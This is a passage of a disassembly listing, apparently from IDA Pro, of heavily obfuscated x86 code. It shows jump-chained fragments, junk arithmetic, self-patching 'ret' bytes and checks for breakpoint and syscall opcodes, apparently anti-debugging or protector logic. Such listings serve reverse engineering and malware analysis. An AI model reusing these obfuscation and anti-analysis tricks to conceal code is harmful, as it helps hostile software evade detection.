; [00000001 BYTES: COLLAPSED FUNCTION nullsub_373. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_44D012: ; CODE XREF: sub_4462B0-382Dj
jmp loc_447AB6
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_44D017: ; CODE XREF: sub_449700+5118j
xchg esi, [ebp+0]
mov edi, 3BDCF0D1h
jmp loc_440D2C
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_44D024: ; CODE XREF: sub_43DCFF:loc_43D929j
mov eax, edx
loc_44D026: ; CODE XREF: ut7h7i2x:00441B86j
xchg eax, [esp+0]
call sub_43D87A
mov eax, 147A4491h
push eax
push 0AF7F81BAh
jmp loc_458863
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
locret_44D03E: ; CODE XREF: ut7h7i2x:0043C901j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458F07
loc_44D03F: ; CODE XREF: sub_458F07+7j
jmp nullsub_364
; END OF FUNCTION CHUNK FOR sub_458F07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B98B
loc_44D044: ; CODE XREF: sub_44B98B:loc_43D15Bj
sub eax, 0C56D98D4h
; END OF FUNCTION CHUNK FOR sub_44B98B
; START OF FUNCTION CHUNK FOR sub_43BE93
loc_44D04A: ; CODE XREF: sub_43BE93+1j
rol eax, 0Eh
sub eax, 0C8AF0617h
add eax, 0D9A0823Ch
or eax, eax
jz loc_43D16F
jmp loc_443F8B
; END OF FUNCTION CHUNK FOR sub_43BE93
; =============== S U B R O U T I N E =======================================
sub_44D066 proc near ; CODE XREF: sub_449D3B+3B2Cp
; ut7h7i2x:004551CEj
; FUNCTION CHUNK AT 0044CF5D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004511B5 SIZE 00000026 BYTES
xchg ecx, [esp+0]
pop ecx
xor edx, 61B8DA0Ah
add edx, ebp
push esi
call sub_43FCEE
loc_44D078: ; CODE XREF: sub_43DB54+Fj
jmp loc_4511B5
sub_44D066 endp
; ---------------------------------------------------------------------------
loc_44D07D: ; CODE XREF: ut7h7i2x:0043AC14j
jmp locret_44C44A
; =============== S U B R O U T I N E =======================================
sub_44D082 proc near ; CODE XREF: ut7h7i2x:0043DE7Dj
; sub_45A3F9+7p
; FUNCTION CHUNK AT 0043F450 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044732C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044826B SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00456ED6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045735F SIZE 00000019 BYTES
xchg edx, [esp+0]
pop edx
xor eax, 782F5F2Dh
push esi
jmp loc_44732C
sub_44D082 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4523CA
loc_44D092: ; CODE XREF: sub_4523CA+6667j
add eax, 18h
jmp loc_43BF4A
; END OF FUNCTION CHUNK FOR sub_4523CA
; ---------------------------------------------------------------------------
loc_44D09A: ; CODE XREF: ut7h7i2x:loc_444146j
push offset loc_43E4FA
jmp loc_447E4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44D0A4: ; CODE XREF: sub_43AA94:loc_43EF9Dj
push 31EA6016h
pop ebx
and ebx, 0D50779D6h
or ebx, 3C283790h
and ebx, 6DE8A8CCh
jmp loc_4427DE
; END OF FUNCTION CHUNK FOR sub_43AA94
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_386. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442262
loc_44D0C2: ; CODE XREF: sub_442262:loc_442268j
jmp nullsub_94
; END OF FUNCTION CHUNK FOR sub_442262
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44D0C7: ; CODE XREF: sub_43A556:loc_44C334j
push 0
lea eax, [ebp-400h]
push eax
push offset sub_45A070
jmp loc_458784
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_44D0DA: ; CODE XREF: sub_4433C5:loc_450F8Cj
; sub_443A45:loc_454D9Cj
jnz loc_43BD95
jmp loc_453EAF
; END OF FUNCTION CHUNK FOR sub_4433C5
; =============== S U B R O U T I N E =======================================
sub_44D0E5 proc near ; DATA XREF: sub_43C2F9:loc_4570BEo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0045123D SIZE 00000014 BYTES
call sub_43F058
push ebx
push 958D3B38h
pop ebx
rol ebx, 1Ch
or ebx, 0E984AEF8h
jmp loc_45123D
sub_44D0E5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_44D0FF: ; CODE XREF: sub_44F495+A0A0j
add eax, 0A45D59Ah
add eax, ebp
add eax, 6D897E2Dh
mov eax, [eax]
push ebx
push eax
jmp loc_44A423
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
loc_44D116: ; CODE XREF: ut7h7i2x:0044C4A6j
jnz loc_44F637
retn
; ---------------------------------------------------------------------------
loc_44D11D: ; CODE XREF: ut7h7i2x:loc_44C492j
sub ebx, 10000h
mov eax, [ebx]
neg eax
jmp loc_457C17
; ---------------------------------------------------------------------------
loc_44D12C: ; CODE XREF: ut7h7i2x:0044B9BEj
add eax, 76FA3BC3h
call sub_43AA94
mov ds:off_41D0B8, eax
lea eax, loc_44A67B
mov byte ptr [eax], 0C3h
jmp loc_454FB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_44D14B: ; CODE XREF: sub_449E96:loc_43C2CEj
mov ds:dword_41D068, eax
lea eax, nullsub_15
mov byte ptr [eax], 0C3h
jmp nullsub_15
; END OF FUNCTION CHUNK FOR sub_449E96
; =============== S U B R O U T I N E =======================================
sub_44D15F proc near ; CODE XREF: sub_40E422+234p
; sub_4117DB+13p ...
; FUNCTION CHUNK AT 0043FB2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452351 SIZE 00000006 BYTES
call sub_452361
jmp loc_43FB2B
sub_44D15F endp
; =============== S U B R O U T I N E =======================================
sub_44D169 proc near ; CODE XREF: ut7h7i2x:loc_45744Dj
; DATA XREF: sub_4428C8+14B7Bo
and ecx, 7
mov al, 1
shl al, cl
push offset loc_43CF41
jmp nullsub_293
sub_44D169 endp
; ---------------------------------------------------------------------------
test ebx, 80C24E95h
jmp loc_440938
; ---------------------------------------------------------------------------
loc_44D185: ; CODE XREF: ut7h7i2x:loc_4548E9j
or edi, 175A8DC5h
add edi, 0E0E643FDh
mov [edi], eax
pop edi
lea eax, sub_450F2A
mov byte ptr [eax], 0C3h
jmp sub_450F2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446C7B
loc_44D1A2: ; CODE XREF: sub_446C7B-21FAj
cdq
jnp loc_444706
cmp esi, 78B29E18h
jmp loc_457308
; END OF FUNCTION CHUNK FOR sub_446C7B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_44D1B4: ; CODE XREF: sub_449E96+18EEj
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-28h]
call sub_4593D3
loc_44D1BF: ; CODE XREF: sub_456520+6j
jmp loc_450CAF
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443FB7
loc_44D1C4: ; CODE XREF: ut7h7i2x:0043A0ACj
; sub_443FB7+7j
jmp sub_4450F6
; END OF FUNCTION CHUNK FOR sub_443FB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_44D1C9: ; CODE XREF: sub_43D021+19978j
jnz loc_449182
sbb eax, ecx
jmp loc_43CBD1
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
push 0A7A46344h
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_44D1DB: ; CODE XREF: sub_43F1B2:loc_44B89Cj
pop eax
rol eax, 8
xor eax, 33D0D46Eh
cmp eax, 0D483CB99h
jmp loc_44085E
; END OF FUNCTION CHUNK FOR sub_43F1B2
; =============== S U B R O U T I N E =======================================
sub_44D1F0 proc near ; CODE XREF: ut7h7i2x:0043ECDCj
; sub_452AE2-EAFCp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004394F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CDD3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D073 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D7D4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043EC62 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043F164 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043F3FD SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004411B3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044443F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444830 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446D17 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004482E9 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044864D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004489A1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044B17F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C369 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0044D497 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00450017 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004501E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450508 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004525DA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004542FC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00457EB1 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz loc_44D497
jmp loc_44B17F
sub_44D1F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445A8C
loc_44D206: ; CODE XREF: sub_445A8C:loc_452A15j
mov eax, esp
push ebx
push 0A1C20926h
pop ebx
add ebx, 8E64346Ch
or ebx, 0C7E27F65h
jmp loc_4456CE
; END OF FUNCTION CHUNK FOR sub_445A8C
; ---------------------------------------------------------------------------
call nullsub_471
jmp ds:dword_41D110
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E13
loc_44D22B: ; CODE XREF: sub_445E13+12425j
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_445E13
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_471. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jz loc_43F29E
mov eax, [esp]
push ecx
jmp loc_453FE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_44D240: ; CODE XREF: sub_44CAB9-C830j
cmp ebx, ebp
jmp loc_456CA4
; END OF FUNCTION CHUNK FOR sub_44CAB9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_509. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov [eax], edi
jmp loc_44AE6F
; ---------------------------------------------------------------------------
db 0Fh
; ---------------------------------------------------------------------------
mov dl, bh
retf
; ---------------------------------------------------------------------------
db 0FEh
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_44D255 proc near ; CODE XREF: ut7h7i2x:00445FDFp
; FUNCTION CHUNK AT 00446A6B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C80D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004516A6 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_43C454[eax*4]
mov [ebp-8], eax
jmp loc_4516A6
sub_44D255 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44D26E proc near ; CODE XREF: sub_439BF8+ACCEp
; ut7h7i2x:004477D3j
; FUNCTION CHUNK AT 00446220 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044D5AA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004568ED SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add eax, 68E6437Fh
add eax, ebp
jmp loc_4568ED
sub_44D26E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44D27F: ; CODE XREF: ut7h7i2x:0044E878j
jl loc_454892
loc_44D285: ; CODE XREF: ut7h7i2x:00451FE9j
jmp loc_453505
; ---------------------------------------------------------------------------
dw 0F99h
; ---------------------------------------------------------------------------
mov dh, [edx-63000022h]
jmp loc_454891
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_44D297: ; CODE XREF: sub_44B68F:loc_43BDB3j
xchg eax, [edx]
or ebx, 0AABBFB3Bh
jmp loc_4392F1
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
loc_44D2A4: ; CODE XREF: ut7h7i2x:0044AEB3j
jge loc_454AB6
xchg ebx, [edi]
jmp loc_43DE49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_44D2B1: ; CODE XREF: sub_44E2C4-403Fj
jge loc_44E36E
loc_44D2B7: ; CODE XREF: sub_44E2C4:loc_44E2D5j
mov eax, 0DD70DD34h
push ebx
push 0F6CFF09Bh
pop ebx
add ebx, 74B01470h
jmp loc_44A993
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_44D2CE: ; CODE XREF: sub_456B19:loc_43F4C5j
cmp al, 0A4h
jz loc_43EBBA
jmp loc_44ABD2
; END OF FUNCTION CHUNK FOR sub_456B19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_44D2DB: ; CODE XREF: sub_43F7A5:loc_454848j
shl eax, 3
add [ebp-8], eax
mov eax, [ebp-8]
shr eax, 0Bh
loc_44D2E7: ; CODE XREF: ut7h7i2x:00448E28j
xor [ebp-8], eax
mov eax, [ebp-8]
jmp loc_44FE88
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
shl ebx, 0Fh
jmp loc_440356
; =============== S U B R O U T I N E =======================================
sub_44D2FA proc near ; CODE XREF: sub_43DCB8+Ap
; ut7h7i2x:0045636Cj
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00439EA6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004526D3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00458168 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
shr ecx, 18h
shl ebx, 1Ch
jmp loc_458168
sub_44D2FA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_44D309: ; CODE XREF: sub_44937E+7F3j
jz loc_441D28
jmp loc_4435D9
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B27
loc_44D314: ; CODE XREF: sub_439B27+103E6j
jz loc_43FAB4
jmp loc_44FB38
; END OF FUNCTION CHUNK FOR sub_439B27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_44D31F: ; CODE XREF: sub_4544E6-70E5j
jnz loc_44F4B4
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jnz loc_43FFFB
jmp loc_45A594
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456111
loc_44D336: ; CODE XREF: sub_456111:loc_445817j
popf
jmp loc_441A83
; END OF FUNCTION CHUNK FOR sub_456111
; ---------------------------------------------------------------------------
loc_44D33C: ; CODE XREF: ut7h7i2x:loc_442C9Aj
cmp dword ptr [ebp-10Ch], 76676264h
jnz loc_446ECA
jmp loc_43A704
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_44D351: ; CODE XREF: sub_44F43B-3F5Dj
jz loc_43DE8E
jmp loc_44853B
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
loc_44D35C: ; CODE XREF: ut7h7i2x:0045468Fj
jnz loc_4442EA
loc_44D362: ; CODE XREF: ut7h7i2x:004585A2j
jmp loc_447EC6
; ---------------------------------------------------------------------------
mov ebp, edi
xor edx, 0CFB9EB5Fh
add ecx, 7806DF22h
jmp loc_4478AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44D37A: ; CODE XREF: sub_43A556:loc_43D771j
xor ebp, 0CCE8D6BBh
jmp loc_441F3F
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458345
loc_44D385: ; CODE XREF: sub_458345:loc_457D22j
add edx, 606428FDh
xchg edx, [esp+0]
jmp sub_452D56
; END OF FUNCTION CHUNK FOR sub_458345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445056
loc_44D393: ; CODE XREF: sub_445056-432Fj
or edx, 3BB9F319h
and edx, 39552948h
add edx, 0BE387475h
call sub_44ED9F
push ecx
jmp loc_441A7E
; END OF FUNCTION CHUNK FOR sub_445056
; =============== S U B R O U T I N E =======================================
sub_44D3B0 proc near ; CODE XREF: ut7h7i2x:00442A47j
; sub_457541:loc_44C2D6j ...
; FUNCTION CHUNK AT 0043F9AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440364 SIZE 0000000E BYTES
xchg eax, [esp+0]
pop eax
add eax, 31386295h
mov eax, [eax]
mov eax, [eax+4]
jmp loc_440364
sub_44D3B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44D3C4: ; CODE XREF: ut7h7i2x:00441E60j
or ebx, ebp
loc_44D3C6: ; CODE XREF: ut7h7i2x:loc_441787j
mov eax, [ebp-4]
mov eax, [eax]
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44D3CB: ; CODE XREF: sub_43AB62:loc_44EF1Dj
and eax, 0FFFFFFh
cmp eax, 0C3C033h
loc_44D3D5: ; CODE XREF: ut7h7i2x:004438B0j
jmp loc_43CF35
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
sbb edi, eax
jmp sub_452DE4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_44D3E1: ; CODE XREF: sub_4544E6+16j
cmp word ptr [eax], 2ECDh
jz loc_44D3F1
jmp loc_458A09
; ---------------------------------------------------------------------------
loc_44D3F1: ; CODE XREF: sub_4544E6-7100j
; sub_4544E6+Dj
jb loc_439CA9
mov eax, [ebp-4]
call sub_450651
test al, al
jmp loc_44D31F
; END OF FUNCTION CHUNK FOR sub_4544E6
; =============== S U B R O U T I N E =======================================
sub_44D406 proc near ; CODE XREF: ut7h7i2x:0043A549j
; ut7h7i2x:00443B6Bp
; FUNCTION CHUNK AT 0044B143 SIZE 00000003 BYTES
xchg eax, [esp+0]
pop eax
ja loc_44B143
sub_44D406 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44BCCB
loc_44D410: ; CODE XREF: sub_44BCCB-A3B7j
cmp dword ptr [ebp-8], 0A22F8A70h
jz loc_45418A
mov eax, [ebp-0Ch]
call sub_454196
jmp loc_45418A
; END OF FUNCTION CHUNK FOR sub_44BCCB
; =============== S U B R O U T I N E =======================================
sub_44D42A proc near ; DATA XREF: ut7h7i2x:0043B563o
; FUNCTION CHUNK AT 004448F4 SIZE 00000005 BYTES
mov byte ptr [eax], 0C3h
jmp loc_4448F4
sub_44D42A endp
; =============== S U B R O U T I N E =======================================
sub_44D432 proc near ; CODE XREF: sub_4195CE+19p
; sub_44D432+5j
; DATA XREF: ...
call sub_44D43D
jmp ds:off_41D064
sub_44D432 endp
; =============== S U B R O U T I N E =======================================
sub_44D43D proc near ; CODE XREF: ut7h7i2x:00444671j
; sub_44D432p ...
var_8 = dword ptr -8
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00442AD7 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00443240 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004451E3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044F404 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044FC85 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459AA8 SIZE 00000009 BYTES
xchg ebx, [esp+0]
mov edx, ebx
jmp loc_442AD7
sub_44D43D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_44D447: ; CODE XREF: sub_4417AF:loc_45312Fj
and ebx, 2F40AA4h
or ebx, 197A43C5h
and ebx, 1B316318h
xor ebx, 9D8F7741h
add ebx, ebp
add ebx, 7940CBBBh
jmp loc_4420D7
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
loc_44D46C: ; CODE XREF: ut7h7i2x:0044CC75j
push edx
push 512CEA7h
pop edx
and edx, 0CDC45EE8h
jns loc_448B8A
; START OF FUNCTION CHUNK FOR sub_4423C1
loc_44D47F: ; CODE XREF: sub_4423C1+F854j
jmp loc_448D75
; END OF FUNCTION CHUNK FOR sub_4423C1
; ---------------------------------------------------------------------------
mov ebp, 0CCB4FFC4h
cmp ecx, ebx
jmp loc_448B84
; ---------------------------------------------------------------------------
cmp edi, ecx
jmp loc_454F64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_44D497: ; CODE XREF: sub_4394DC:loc_4394F2j
; sub_44D1F0+Bj ...
pushf
push 768577B5h
pop eax
rol eax, 19h
or eax, 5A119CFFh
test eax, 4000000h
jmp loc_446D17
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44D4B2: ; CODE XREF: sub_447CBE-D394j
; sub_439B67:loc_448C9Fj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_4484CC
jmp loc_43EE20
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453A91
loc_44D4C3: ; CODE XREF: sub_453A91-16D11j
jz loc_439768
jmp loc_4398C9
; END OF FUNCTION CHUNK FOR sub_453A91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D797
loc_44D4CE: ; CODE XREF: sub_43D797+7B3Bj
xor edx, eax
sbb ebp, edx
add edx, 1C8E6EDEh
loc_44D4D8: ; CODE XREF: sub_43D797:loc_4452C4j
add edx, 785596F0h
xchg edx, [esp+0]
jmp sub_4448AF
; END OF FUNCTION CHUNK FOR sub_43D797
; ---------------------------------------------------------------------------
push edx
push 2CC7530Ah
and edx, 4F26F5D5h
jmp loc_456563
; ---------------------------------------------------------------------------
locret_44D4F7: ; CODE XREF: ut7h7i2x:loc_4579F9j
retn
; ---------------------------------------------------------------------------
xor eax, 3628496Ah
mov edx, [ebp+0]
jmp sub_447E29
; ---------------------------------------------------------------------------
loc_44D506: ; CODE XREF: ut7h7i2x:loc_44B13Ej
push 0C2AB5603h
pop eax
and eax, 9335ED84h
add eax, 7E22EA84h
mov eax, [eax]
or eax, eax
jnz loc_43D716
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44D522: ; CODE XREF: sub_439BF8+156A7j
jmp loc_4554C9
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_44D527: ; CODE XREF: ut7h7i2x:loc_452D2Ej
mov byte ptr [eax], 0C3h
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44D52A: ; CODE XREF: sub_457A66:loc_44B519j
jmp loc_45A902
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_44D52F: ; CODE XREF: ut7h7i2x:00443912j
mov eax, [esp]
push edx
push offset loc_44E026
jmp loc_44400F
; ---------------------------------------------------------------------------
loc_44D53D: ; DATA XREF: sub_4544E6:loc_4424F3o
test al, al
jnz loc_44F4B4
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jmp loc_44DAB4
; ---------------------------------------------------------------------------
xor ebx, 3BB47B0Ah
jmp sub_44124A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F9C6
loc_44D55B: ; CODE XREF: sub_43F9C6+Aj
push 0C6CEB2A2h
pop ecx
and ecx, 9050E12Bh
rol ecx, 8
and ecx, 78FD0273h
add ecx, 0BFA3A120h
jmp loc_454DDA
; END OF FUNCTION CHUNK FOR sub_43F9C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_44D57B: ; CODE XREF: sub_44DB48:loc_4449D0j
mov eax, edx
xchg eax, [esp+4+var_4]
call sub_4589FE
mov eax, 1F1D4A60h
call sub_43AA94
jmp loc_43C2CE
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
dd 46A38A0Fh, 0BEE90000h
db 10h, 2 dup(0)
; ---------------------------------------------------------------------------
locret_44D59F: ; CODE XREF: ut7h7i2x:00448BAEj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_44D5A0: ; CODE XREF: sub_4431FF-1DB3j
jmp loc_44C31D
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440AE3
loc_44D5A5: ; CODE XREF: sub_440AE3+Aj
jmp loc_455B78
; END OF FUNCTION CHUNK FOR sub_440AE3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D26E
loc_44D5AA: ; CODE XREF: sub_44D26E:loc_4568EDj
push edi
push 8DF3DC3Ah
pop edi
and edi, 0A48B5CF0h
jmp loc_446220
; END OF FUNCTION CHUNK FOR sub_44D26E
; ---------------------------------------------------------------------------
loc_44D5BC: ; CODE XREF: ut7h7i2x:00441EA3j
xchg eax, [ebx]
; =============== S U B R O U T I N E =======================================
sub_44D5BE proc near ; CODE XREF: sub_441DBBp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043C1C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044002C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440A61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442B27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443E16 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444540 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449542 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A4DB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044BD87 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045183B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00452FF7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004573ED SIZE 00000015 BYTES
xchg ebx, [esp+0]
pop ebx
jo loc_443E16
pop edx
mov eax, [esp-8+arg_4]
jmp loc_444540
sub_44D5BE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_44D5D1: ; CODE XREF: sub_455807:loc_439C58j
jz loc_453DF3
jmp loc_45A13E
; END OF FUNCTION CHUNK FOR sub_455807
; =============== S U B R O U T I N E =======================================
sub_44D5DC proc near ; DATA XREF: sub_45500F-1354Ao
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004390A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C16C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045295F SIZE 00000020 BYTES
add edx, 62665030h
pushf
push 0CFC7C326h
pop eax
jmp loc_4390A5
sub_44D5DC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44D5EE: ; CODE XREF: sub_447CBE:loc_45A542j
push offset loc_44EEF2
jmp nullsub_434
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_44D5F8: ; CODE XREF: sub_4558CC+6j
pop edx
mov eax, [esp-4+arg_0]
push edx
push esi
jmp loc_453889
; END OF FUNCTION CHUNK FOR sub_4558CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_44D603: ; CODE XREF: sub_4471CA:loc_44324Fj
mov ecx, 0FCF9D20Dh
rol ebp, 10h
jmp loc_44643B
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
loc_44D610: ; CODE XREF: ut7h7i2x:0044B724j
jnp loc_449814
jo loc_4564CF
xchg edx, esi
push esi
jmp loc_442D24
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_44D624: ; CODE XREF: sub_44865D-CE72j
; sub_44865D+5DFj
add eax, 19922699h
and eax, 59FEEEBEh
jns loc_44157C
cdq
jmp loc_441577
; ---------------------------------------------------------------------------
loc_44D63C: ; CODE XREF: sub_44865D:loc_456C31j
push offset sub_450C02
